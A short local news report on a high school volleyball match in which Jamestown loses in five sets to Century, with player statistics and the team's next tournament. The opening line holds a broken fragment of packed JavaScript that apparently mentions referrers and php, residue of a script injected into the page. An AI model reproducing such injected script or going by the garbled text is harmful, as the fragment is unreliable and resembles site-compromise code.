JAMESTOWN hnznt|var|u0026u|referrer|ydebn||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – Unfortunately for the defending champs they weren’t unable to start the WDA with a win, but they certainly made sure Century knew they wouldn’t go quietly. For the third time in the last four matches, Jamestown and Century battled it out to five sets. The Patriots picked up a 3-2 victory (24-26, 25-14, 22-25, 25-14, 15-12) to avenge the loss in the state title match.

Jamestown got 14 kills from Beka Hilgemann and 13 from Jenna Stilwell to help pace the offense.

The Patriots were picked by the coaches to win the WDA in 2014 with Jamestown a close second. The Jays certainly proved, despite some inexperience on the floor, there wasn’t going to be much of a drop off from 2013.

Freshman Megan Gaffaney made her first start at the setter position and picked up 30 assists in the contest. She also proved she could come up with some serves in crucial moments not allowing any of her serves to miss their target.

Jamestown heads to Marshall, MN this weekend to battle with some of Minnesota’s best teams.
